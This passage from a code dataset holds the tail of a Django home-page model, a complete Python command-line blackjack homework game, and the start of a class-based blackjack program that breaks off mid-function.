models.CharField('title', max_length=50)\n description = models.TextField('Home description')\n image = models.ImageField('Image', upload_to='Home', blank=True)\n\n class Meta:\n verbose_name = 'Main page'\n verbose_name_plural = 'Main page'\n\n def __str__(self):\n return self.title\n","sub_path":"applications/home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"578332784","text":"#!/usr/bin/env python3\n\n# Harrison Erd\n# Nov 14, 2018\n# Homework 12\n# blackjack game\n\nfrom os import system, name\nfrom random import choice, choices, seed\n\n\ndef result(player_hand, dealer_hand, result_num):\n results = [\"Player bust, DEALER WINS\", \"Dealer bust, PLAYER WINS\",\n \"Tie, DEALER WINS\", \"PLAYER WINS\", \"DEALER WINS\"]\n print(\"\\nDealer cards and total:\")\n print(dealer_hand, total(dealer_hand))\n print(\"Player cards and total:\")\n print(player_hand, total(player_hand))\n print(results[result_num])\n print(\"\\n\\nWould you like to play again?\")\n again = input(\"Press [Y]es to continue or press any key to exit. \")\n if again.lower() == \"y\":\n main()\n else:\n exit()\n\n\ndef total(hand):\n total = 0\n for card in hand:\n if card == \"J\" or card == \"Q\" or card == \"K\":\n total = total + 10\n elif card == \"A\":\n total = total + 11\n else:\n total = total + card\n return total\n\n\ndef main():\n if name == \"nt\":\n system(\"cls\")\n elif name == \"posix\":\n system(\"clear\")\n seed()\n deck = [\"A\", 2, 3, 4, 5, 6, 7, 8, 9, 10, \"J\", \"Q\", \"K\"] * 4\n dealer_hand = choices(deck, k=2)\n player_hand = choices(deck, k=2)\n while True:\n print(\"\\nDealer card:\")\n print(dealer_hand[0])\n print(\"Player cards and total:\")\n print(player_hand, total(player_hand))\n print()\n option = input(\"Would you like to [H]it or [S]tand? 
\")\n if option.lower() == \"h\":\n player_hand.append(choice(deck))\n if total(player_hand) > 21:\n if \"A\" in player_hand:\n player_hand.remove(\"A\")\n player_hand.append(1)\n if total(player_hand) > 21:\n result(player_hand, dealer_hand, 0)\n else:\n result(player_hand, dealer_hand, 0)\n if option.lower() == \"s\":\n while total(dealer_hand) < 16:\n dealer_hand.append(choice(deck))\n if total(dealer_hand) > 21:\n if \"A\" in dealer_hand:\n dealer_hand.remove(\"A\")\n dealer_hand.append(1)\n if total(dealer_hand) > 21:\n result(player_hand, dealer_hand, 1)\n else:\n result(player_hand, dealer_hand, 1)\n if total(player_hand) == total(dealer_hand):\n result(player_hand, dealer_hand, 2)\n if total(player_hand) > total(dealer_hand) or \\\n total(player_hand) == 21:\n result(player_hand, dealer_hand, 3)\n else:\n result(player_hand, dealer_hand, 4)\n if option.lower() != \"h\" and option.lower() != \"s\":\n print(\"You must enter either 'H' or 'S'!\")\n\nmain()\n\n","sub_path":"blackjack/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"502448298","text":"#Set the suits&ranks&values \r\nimport random\r\n\r\nsuits = ('Hearts', 'Diamonds', 'Spades', 'Clubs')\r\nranks = ('Two', 'Three', 'Four', 'Five', 'Six', 'Seven', 'Eight', 'Nine', 'Ten', 'Jack', 'Queen', 'King', 'Ace')\r\nvalues = {'Two':2, 'Three':3, 'Four':4, 'Five':5, 'Six':6, 'Seven':7, 'Eight':8, 'Nine':9, 'Ten':10, 'Jack':10,\r\n 'Queen':10, 'King':10, 'Ace':11}\r\n\r\nplaying = True\r\n#Class definitions\r\n#Card class\r\nclass Card:\r\n \r\n def __init__(self,suit,rank):\r\n self.suit=suit\r\n self.rank=rank\r\n self.value=values[rank]\r\n \r\n \r\n \r\n def __str__(self):\r\n return self.rank + ' of ' + self.suit\r\n#Deck class\r\nclass Deck:\r\n \r\n def __init__(self):\r\n self.deck = [] # start with an empty list\r\n for suit in suits:\r\n for rank in ranks:\r\n self.deck.append(Card(suit,rank))\r\n \r\n \r\n \r\n\r\n def shuffle(self):\r\n random.shuffle(self.deck)\r\n \r\n def deal(self):\r\n return self.deck.pop()\r\n#Hand class\r\nclass Hand:\r\n def __init__(self):\r\n self.cards = [] # start with an empty list as we did in the Deck class\r\n self.value = 0 # start with zero value\r\n self.aces = 0 # add an attribute to keep track of aces\r\n \r\n def add_card(self,card):\r\n self.cards.append(card)\r\n self.value=values[card.rank]+self.value\r\n if card.rank=='Ace':\r\n self.aces+=1\r\n \r\n \r\n def adjust_for_ace(self):\r\n if self.value>21 and self.aces!=0:\r\n self.value-=10\r\n self.aces-=1\r\n#Chips class\r\nclass Chips:\r\n \r\n def __init__(self):\r\n self.total = 100 # This can be set to a default value or supplied by a user input\r\n self.bet = 0\r\n \r\n def win_bet(self):\r\n self.total+=self.bet\r\n \r\n \r\n def lose_bet(self):\r\n self.total-=self.bet\r\n#Function Defintions\r\n#Function for taking bets\r\ndef take_bet(Chips):\r\n while True:\r\n try :\r\n bet=int(input('please make a bet: '))\r\n if bet<=Chips.total:\r\n return bet\r\n \r\n else:\r\n print('you dont have enough chips')\r\n except:\r\n print('wrong input please enter a number')\r\n#Function for taking hits\r\ndef hit(deck,hand):\r\n hand.add_card(deck.deal())\r\n hand.adjust_for_ace()\r\n#Function prompting the Player to Hit or Stand\r\ndef hit_or_stand(deck,hand):\r\n global playing # to control an upcoming while loop\r\n choise='w'\r\n while choise not in ['H','S']:\r\n choise=input('do you want to Hit 
or Stand(H or S): ')\r\n if choise not in ['H','S']:\r\n print('wrong input ')\r\n elif choise=='H':\r\n hit(deck,hand)\r\n elif choise=='S':\r\n playing=False\r\n#Functions to display cards\r\ndef show_some(player,dealer):\r\n print(\"\\nDealer's Hand:\")\r\n print(\"